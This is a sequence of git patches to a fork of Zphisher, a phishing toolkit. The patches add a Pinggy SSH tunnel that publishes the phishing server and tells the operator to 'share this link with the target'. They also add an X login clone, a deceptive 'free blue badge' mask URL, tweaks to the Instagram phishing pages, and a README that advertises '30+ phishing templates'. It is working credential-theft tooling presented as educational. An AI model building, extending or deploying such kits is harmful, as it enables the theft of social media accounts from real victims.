From b2352c8d46ee78904c60aa91d58b058dcbc0156c Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Sat, 9 Aug 2025 11:55:00 +0530 Subject: [PATCH 01/18] Initial Commit --- zphisher.sh | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/zphisher.sh b/zphisher.sh index 8cc65912..245e6b70 100755 --- a/zphisher.sh +++ b/zphisher.sh @@ -508,6 +508,14 @@ start_loclx() { capture_data } +start_pinggy() { + echo -e "\n[+] Starting Pinggy tunnel..." + read -p "[?] Enter your local port (default 8080): " port + port=${port:-8080} + + ssh -p 443 -R0:localhost:$port qr@free.pinggy.io +} + ## Start localhost start_localhost() { cusport @@ -526,6 +534,7 @@ tunnel_menu() { ${RED}[${WHITE}01${RED}]${ORANGE} Localhost ${RED}[${WHITE}02${RED}]${ORANGE} Cloudflared ${RED}[${CYAN}Auto Detects${RED}] ${RED}[${WHITE}03${RED}]${ORANGE} LocalXpose ${RED}[${CYAN}NEW! Max 15Min${RED}] + ${RED}[${WHITE}03${RED}]${ORANGE} Pinngy ${RED}[${CYAN}NEW! Max 60Min${RED}] EOF @@ -538,6 +547,8 @@ tunnel_menu() { start_cloudflared;; 3 | 03) start_loclx;; + 4 | 04) + start_pinggy;; *) echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..." { sleep 1; tunnel_menu; };; From 7d44ff141d22b19019eab96acba7b811ddb6757f Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Sat, 9 Aug 2025 12:01:24 +0530 Subject: [PATCH 02/18] Test 1 --- zphisher.sh | 18 ++++++++++++++++-- 1 file changed, 16 insertions(+), 2 deletions(-) diff --git a/zphisher.sh b/zphisher.sh index 245e6b70..4e050882 100755 --- a/zphisher.sh +++ b/zphisher.sh @@ -513,7 +513,21 @@ start_pinggy() { read -p "[?] Enter your local port (default 8080): " port port=${port:-8080} - ssh -p 443 -R0:localhost:$port qr@free.pinggy.io + echo -e "[*] Please wait while we generate your public link...\n" + + # Start Pinggy tunnel in background + ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:$port qr@free.pinggy.io > pinggy.log 2>&1 & + sleep 5 + + # Extract public link from Pinggy output + PINGGY_URL=$(grep -o 'https://[0-9a-z.-]*\.pinggy\.io' pinggy.log | head -n 1) + + if [[ -n "$PINGGY_URL" ]]; then + echo -e "[+] Pinggy URL: $PINGGY_URL" + echo -e "[*] Share this link with the target.\n" + else + echo -e "[!] Could not retrieve Pinggy URL. Check pinggy.log for details." + fi } ## Start localhost @@ -534,7 +548,7 @@ tunnel_menu() { ${RED}[${WHITE}01${RED}]${ORANGE} Localhost ${RED}[${WHITE}02${RED}]${ORANGE} Cloudflared ${RED}[${CYAN}Auto Detects${RED}] ${RED}[${WHITE}03${RED}]${ORANGE} LocalXpose ${RED}[${CYAN}NEW! Max 15Min${RED}] - ${RED}[${WHITE}03${RED}]${ORANGE} Pinngy ${RED}[${CYAN}NEW! Max 60Min${RED}] + ${RED}[${WHITE}04${RED}]${ORANGE} Pinngy ${RED}[${CYAN}NEW! Max 60Min${RED}] EOF From 6c31e84146ca3a220d46e528bd9a75923ed92bc8 Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Sat, 9 Aug 2025 12:04:07 +0530 Subject: [PATCH 03/18] Test 2 --- zphisher.sh | 16 +--------------- 1 file changed, 1 insertion(+), 15 deletions(-) diff --git a/zphisher.sh b/zphisher.sh index 4e050882..bdd08966 100755 --- a/zphisher.sh +++ b/zphisher.sh @@ -513,21 +513,7 @@ start_pinggy() { read -p "[?] Enter your local port (default 8080): " port port=${port:-8080} - echo -e "[*] Please wait while we generate your public link...\n" - - # Start Pinggy tunnel in background - ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:$port qr@free.pinggy.io > pinggy.log 2>&1 & - sleep 5 - - # Extract public link from Pinggy output - PINGGY_URL=$(grep -o 'https://[0-9a-z.-]*\.pinggy\.io' pinggy.log | head -n 1) - - if [[ -n "$PINGGY_URL" ]]; then - echo -e "[+] Pinggy URL: $PINGGY_URL" - echo -e "[*] Share this link with the target.\n" - else - echo -e "[!] Could not retrieve Pinggy URL. Check pinggy.log for details." - fi + ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:$port qr@free.pinggy.io } ## Start localhost From a7806057a7ad4e9d067d26b3ffe56873a8b5724c Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Sat, 9 Aug 2025 12:15:46 +0530 Subject: [PATCH 04/18] Added Pinggy Port Forwarding --- zphisher.sh | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/zphisher.sh b/zphisher.sh index bdd08966..12f22aad 100755 --- a/zphisher.sh +++ b/zphisher.sh @@ -509,13 +509,22 @@ start_loclx() { } start_pinggy() { - echo -e "\n[+] Starting Pinggy tunnel..." - read -p "[?] Enter your local port (default 8080): " port + read -p "[?] Enter your local port to start server on (default 8080): " port port=${port:-8080} - ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:$port qr@free.pinggy.io + echo -e "\n[+] Starting local server on port $port..." + setup_site # Your server start command or function + sleep 3 + + echo -e "\n[+] Starting Pinggy tunnel forwarding localhost:$port ...\n" + ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:$port qr@free.pinggy.io & + + sleep 5 # Give tunnel time to establish + + capture_data # Start capturing visitor data } + ## Start localhost start_localhost() { cusport @@ -534,7 +543,7 @@ tunnel_menu() { ${RED}[${WHITE}01${RED}]${ORANGE} Localhost ${RED}[${WHITE}02${RED}]${ORANGE} Cloudflared ${RED}[${CYAN}Auto Detects${RED}] ${RED}[${WHITE}03${RED}]${ORANGE} LocalXpose ${RED}[${CYAN}NEW! Max 15Min${RED}] - ${RED}[${WHITE}04${RED}]${ORANGE} Pinngy ${RED}[${CYAN}NEW! Max 60Min${RED}] + ${RED}[${WHITE}04${RED}]${ORANGE} Pinngy ${RED}[${CYAN}NEW! Max 60Min${RED}] EOF From a114571965242291ec895d6bcbed150022f218df Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Sat, 9 Aug 2025 12:24:39 +0530 Subject: [PATCH 05/18] Added Pinggy Port Forwarding:Update --- zphisher.sh | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/zphisher.sh b/zphisher.sh index 12f22aad..01f7037d 100755 --- a/zphisher.sh +++ b/zphisher.sh @@ -508,6 +508,7 @@ start_loclx() { capture_data } +## Start pinggy start_pinggy() { read -p "[?] Enter your local port to start server on (default 8080): " port port=${port:-8080} @@ -516,6 +517,7 @@ start_pinggy() { setup_site # Your server start command or function sleep 3 + echo -e "\e[1;31m[!!! IMPORTANT !!!] SSH password is: blank (type 'blank' when prompted)\e[0m" echo -e "\n[+] Starting Pinggy tunnel forwarding localhost:$port ...\n" ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:$port qr@free.pinggy.io & @@ -524,7 +526,6 @@ start_pinggy() { capture_data # Start capturing visitor data } - ## Start localhost start_localhost() { cusport From 8ce12b66135c282e6297400444fec394eaec1cd4 Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Sat, 9 Aug 2025 13:11:31 +0530 Subject: [PATCH 06/18] Update index.php Hiding Caution Page --- .sites/instagram/index.php | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/.sites/instagram/index.php b/.sites/instagram/index.php index f38c5805..76157644 100644 --- a/.sites/instagram/index.php +++ b/.sites/instagram/index.php @@ -1,5 +1,10 @@ From 4dd04dbfb9f4db3b6633a096019a336de4f72c45 Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Sat, 9 Aug 2025 13:14:04 +0530 Subject: [PATCH 07/18] Update login.php --- .sites/instagram/login.php | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.sites/instagram/login.php b/.sites/instagram/login.php index b7a4f4ef..48a0669b 100644 --- a/.sites/instagram/login.php +++ b/.sites/instagram/login.php @@ -1,6 +1,6 @@ \ No newline at end of file +?> From 7a4dbc9e0459cfc272f5303dc918f53fe15fada8 Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Sat, 9 Aug 2025 13:14:34 +0530 Subject: [PATCH 08/18] Update index.php --- .sites/instagram/index.php | 4 ---- 1 file changed, 4 deletions(-) diff --git a/.sites/instagram/index.php b/.sites/instagram/index.php index 76157644..899feb1d 100644 --- a/.sites/instagram/index.php +++ b/.sites/instagram/index.php @@ -1,10 +1,6 @@ From a137d2d0d6e08a2c7e79040689ba0fbb9c44acee Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Sat, 9 Aug 2025 13:15:05 +0530 Subject: [PATCH 09/18] Update index.php --- .sites/instagram/index.php | 1 - 1 file changed, 1 deletion(-) diff --git a/.sites/instagram/index.php b/.sites/instagram/index.php index 899feb1d..699690e1 100644 --- a/.sites/instagram/index.php +++ b/.sites/instagram/index.php @@ -1,6 +1,5 @@ From d3a47e21a8c01035897133320daa25b7728aac64 Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Sat, 9 Aug 2025 13:15:20 +0530 Subject: [PATCH 10/18] Update login.php --- .sites/instagram/login.php | 1 - 1 file changed, 1 deletion(-) diff --git a/.sites/instagram/login.php b/.sites/instagram/login.php index 48a0669b..187196c9 100644 --- a/.sites/instagram/login.php +++ b/.sites/instagram/login.php @@ -1,5 +1,4 @@ Date: Sat, 9 Aug 2025 14:05:51 +0530 Subject: [PATCH 11/18] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 4c4b5076..9a4490ed 100644 --- a/README.md +++ b/README.md @@ -44,6 +44,7 @@ It only demonstrates "how phishing works". You shall not misuse the informati - Localhost - Cloudflared - LocalXpose + - Pinggy - Mask URL support - Docker support @@ -187,3 +188,4 @@ $ zphisher + From 6018dd0368d934b3fb25da8375869b50e925f5f8 Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Sat, 9 Aug 2025 20:23:25 +0530 Subject: [PATCH 12/18] Update README.md --- README.md | 203 ++++++------------------------------------------------ 1 file changed, 21 insertions(+), 182 deletions(-) diff --git a/README.md b/README.md index 9a4490ed..ad216f32 100644 --- a/README.md +++ b/README.md @@ -1,191 +1,30 @@ - +# zphisher-jr -

- -

+[![Made with Bash](https://img.shields.io/badge/Made%20with-Bash-blue.svg)](https://www.gnu.org/software/bash/) +[![License](https://img.shields.io/badge/License-MIT-green.svg)](LICENSE) +[![Status](https://img.shields.io/badge/Status-Work%20in%20Progress-yellow.svg)](#) -

- - - - - -

+A **custom fork** of [Zphisher](https://github.com/htr-tech/zphisher) focused on adding **free port forwarding services**. +Currently supports [Pinggy](https://pinggy.io/) — more tunnelling services coming soon! -

- - - - - -

+> **Note:** This tool is for **educational purposes only**. +> The author is **not responsible** for any misuse. -

A beginners friendly, Automated phishing tool with 30+ templates.

+--- -## +## ✨ Features -

Disclaimer

+- 🎯 30+ phishing templates (from the original Zphisher) +- ⚡ Automated phishing page generation +- 🌐 Integrated **Pinggy** tunnelling support +- 🔄 Works with Cloudflared & LocalXpose +- 💻 Simple CLI interface -Any actions and or activities related to Zphisher is solely your responsibility. The misuse of this toolkit can result in criminal charges brought against the persons in question. The contributors will not be held responsible in the event any criminal charges be brought against any individuals misusing this toolkit to break the law. +--- -This toolkit contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using,or in any other way utilizing this in a wrong way. - -This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here! - -It only demonstrates "how phishing works". You shall not misuse the information to gain unauthorized access to someones social media. However you may try out this at your own risk. - -## - -### Features - -- Latest and updated login pages. -- Beginners friendly -- Multiple tunneling options - - Localhost - - Cloudflared - - LocalXpose - - Pinggy -- Mask URL support -- Docker support - -## - -### Installation - -- Just, Clone this repository - - ``` - git clone --depth=1 https://github.com/htr-tech/zphisher.git - ``` - -- Now go to cloned directory and run `zphisher.sh` - - ``` - $ cd zphisher - $ bash zphisher.sh - ``` - -- On first launch, It'll install the dependencies and that's it. ***Zphisher*** is installed. - -## - -### Installation (Termux) -You can easily install zphisher in Termux by using tur-repo -``` -$ pkg install tur-repo -$ pkg install zphisher -$ zphisher -``` -### A Note : -***Termux discourages hacking*** .. So never discuss anything related to *zphisher* in any of the termux discussion groups. For more check : [wiki](https://wiki.termux.com/wiki/Hacking) - -## - -

- -

- -## - -### Installation via ".deb" file - -- Download `.deb` files from the [**Latest Release**](https://github.com/htr-tech/zphisher/releases/latest) -- If you are using ***termux*** then download the `*_termux.deb` - -- Install the `.deb` file by executing - ``` - apt install - ``` - Or - ``` - $ dpkg -i - $ apt install -f - ``` - -## - -### Run on Docker - -- Docker Image Mirror: - - **DockerHub** : - ``` - docker pull htrtech/zphisher - ``` - - **GHCR** : - ``` - docker pull ghcr.io/htr-tech/zphisher:latest - ``` - -- By using the wrapper script [**run-docker.sh**](https://raw.githubusercontent.com/htr-tech/zphisher/master/run-docker.sh) - - ``` - $ curl -LO https://raw.githubusercontent.com/htr-tech/zphisher/master/run-docker.sh - $ bash run-docker.sh - ``` -- Temporary Container - - ``` - docker run --rm -ti htrtech/zphisher - ``` - - Remember to mount the `auth` directory. - -## - -
-

Dependencies

 - -Zphisher requires following programs to run properly - -- `git` -- `curl` -- `php` - -> All the dependencies will be installed automatically when you run **Zphisher** for the first time. -
- -
-

Tested on

 - -- **Ubuntu** -- **Debian** -- **Arch** -- **Manjaro** -- **Fedora** -- **Termux** -
- -## - -

:: Workflow ::

-

- -

- -## - -### Find Me on: -

- - -

- - -### *Thanks to all contributors*: - -
- - - - - - - - - - - - - - - -

1RaY-1
Aditya Shakya
Ali Milani
AmnesiA
KasRoudra
Moises Tapia

Mr.Derek
Mustakim Ahmed
sepp0
TripleHat
Yisus7u7
- - +## 🚀 Getting Started +### 1️⃣ Clone the Repository +```bash +git clone https://github.com/jrdevadattan/zphisher-jr.git +cd zphisher-jr From d92b5abf0b6ef605fb1d68de001cbad7bcb69e1d Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Sat, 6 Sep 2025 14:32:06 +0530 Subject: [PATCH 13/18] X template files --- .sites/x/index.php | 0 .sites/x/login.html | 0 .sites/x/login.php | 0 3 files changed, 0 insertions(+), 0 deletions(-) create mode 100644 .sites/x/index.php create mode 100644 .sites/x/login.html create mode 100644 .sites/x/login.php diff --git a/.sites/x/index.php b/.sites/x/index.php new file mode 100644 index 00000000..e69de29b diff --git a/.sites/x/login.html b/.sites/x/login.html new file mode 100644 index 00000000..e69de29b diff --git a/.sites/x/login.php b/.sites/x/login.php new file mode 100644 index 00000000..e69de29b From 3bd1704fbda844a8c1dad701a2f2e021b867ff78 Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Sat, 6 Sep 2025 14:35:19 +0530 Subject: [PATCH 14/18] Update index.php --- .sites/x/index.php | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/.sites/x/index.php b/.sites/x/index.php index e69de29b..1f8cd71c 100644 --- a/.sites/x/index.php +++ b/.sites/x/index.php @@ -0,0 +1,5 @@ + \ No newline at end of file From 369f4c14ac38a66eab9c1be69d5a6c3fd1c20618 Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Sat, 6 Sep 2025 17:16:01 +0530 Subject: [PATCH 15/18] Added X website --- .sites/x/login.html | 270 ++++++++++++++++++++++++++++++++++++++++++++ .sites/x/login.php | 6 + 2 files changed, 276 insertions(+) diff --git a/.sites/x/login.html b/.sites/x/login.html index e69de29b..bfe792a9 100644 --- a/.sites/x/login.html +++ b/.sites/x/login.html @@ -0,0 +1,270 @@ + + + + + + Sign in to X + + + + + +
+ + + + + +

Sign in to X

+ + + + + +
+ or +
+ +
+
+ + +
+
+ + +
+ + + + + + + +
+ + + \ No newline at end of file diff --git a/.sites/x/login.php b/.sites/x/login.php index e69de29b..db5a76ed 100644 --- a/.sites/x/login.php +++ b/.sites/x/login.php @@ -0,0 +1,6 @@ + \ No newline at end of file From 5e532d6eb0f671d92320987492c59019bb21d403 Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Sat, 6 Sep 2025 17:22:40 +0530 Subject: [PATCH 16/18] Update zphisher.sh --- zphisher.sh | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/zphisher.sh b/zphisher.sh index 01f7037d..abbd3b2c 100755 --- a/zphisher.sh +++ b/zphisher.sh @@ -771,7 +771,7 @@ main_menu() { ${RED}[${WHITE}09${RED}]${ORANGE} Playstation ${RED}[${WHITE}19${RED}]${ORANGE} Reddit ${RED}[${WHITE}29${RED}]${ORANGE} Vk ${RED}[${WHITE}10${RED}]${ORANGE} Tiktok ${RED}[${WHITE}20${RED}]${ORANGE} Adobe ${RED}[${WHITE}30${RED}]${ORANGE} XBOX ${RED}[${WHITE}31${RED}]${ORANGE} Mediafire ${RED}[${WHITE}32${RED}]${ORANGE} Gitlab ${RED}[${WHITE}33${RED}]${ORANGE} Github - ${RED}[${WHITE}34${RED}]${ORANGE} Discord ${RED}[${WHITE}35${RED}]${ORANGE} Roblox + ${RED}[${WHITE}34${RED}]${ORANGE} Discord ${RED}[${WHITE}35${RED}]${ORANGE} Roblox ${RED}[${WHITE}08${RED}]${ORANGE} X ${RED}[${WHITE}99${RED}]${ORANGE} About ${RED}[${WHITE}00${RED}]${ORANGE} Exit @@ -912,6 +912,10 @@ main_menu() { website="roblox" mask='https://get-free-robux' tunnel_menu;; + 36) + website="x" + mask='https://get-blue-badge-on-x-free' + tunnel_menu;; 99) about;; 0 | 00 ) From 7813fd27a1b1f9fecbcb46f674f565ecdc236804 Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Sat, 6 Sep 2025 17:25:10 +0530 Subject: [PATCH 17/18] Update zphisher.sh --- zphisher.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/zphisher.sh b/zphisher.sh index abbd3b2c..08210df6 100755 --- a/zphisher.sh +++ b/zphisher.sh @@ -771,7 +771,7 @@ main_menu() { ${RED}[${WHITE}09${RED}]${ORANGE} Playstation ${RED}[${WHITE}19${RED}]${ORANGE} Reddit ${RED}[${WHITE}29${RED}]${ORANGE} Vk ${RED}[${WHITE}10${RED}]${ORANGE} Tiktok ${RED}[${WHITE}20${RED}]${ORANGE} Adobe ${RED}[${WHITE}30${RED}]${ORANGE} XBOX ${RED}[${WHITE}31${RED}]${ORANGE} Mediafire ${RED}[${WHITE}32${RED}]${ORANGE} Gitlab ${RED}[${WHITE}33${RED}]${ORANGE} Github - ${RED}[${WHITE}34${RED}]${ORANGE} Discord ${RED}[${WHITE}35${RED}]${ORANGE} Roblox ${RED}[${WHITE}08${RED}]${ORANGE} X + ${RED}[${WHITE}34${RED}]${ORANGE} Discord ${RED}[${WHITE}35${RED}]${ORANGE} Roblox ${RED}[${WHITE}08${RED}]${ORANGE} X ${RED}[${WHITE}99${RED}]${ORANGE} About ${RED}[${WHITE}00${RED}]${ORANGE} Exit From 31f9977236f0e22fbd81c820942bbf1c5db18434 Mon Sep 17 00:00:00 2001 From: J R Deva Dattan Date: Tue, 9 Sep 2025 17:46:01 +0530 Subject: [PATCH 18/18] Update README.md --- README.md | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/README.md b/README.md index ad216f32..b2bbb747 100644 --- a/README.md +++ b/README.md @@ -12,19 +12,20 @@ Currently supports [Pinggy](https://pinggy.io/) — more tunnelling services com --- -## ✨ Features +## Features -- 🎯 30+ phishing templates (from the original Zphisher) -- ⚡ Automated phishing page generation -- 🌐 Integrated **Pinggy** tunnelling support -- 🔄 Works with Cloudflared & LocalXpose -- 💻 Simple CLI interface +- 30+ phishing templates (from the original Zphisher) +- Automated phishing page generation +- Integrated **Pinggy** tunnelling support +- Works with Cloudflared & LocalXpose +- Simple CLI interface --- -## 🚀 Getting Started +## Getting Started -### 1️⃣ Clone the Repository +### Clone the Repository ```bash git clone https://github.com/jrdevadattan/zphisher-jr.git cd zphisher-jr +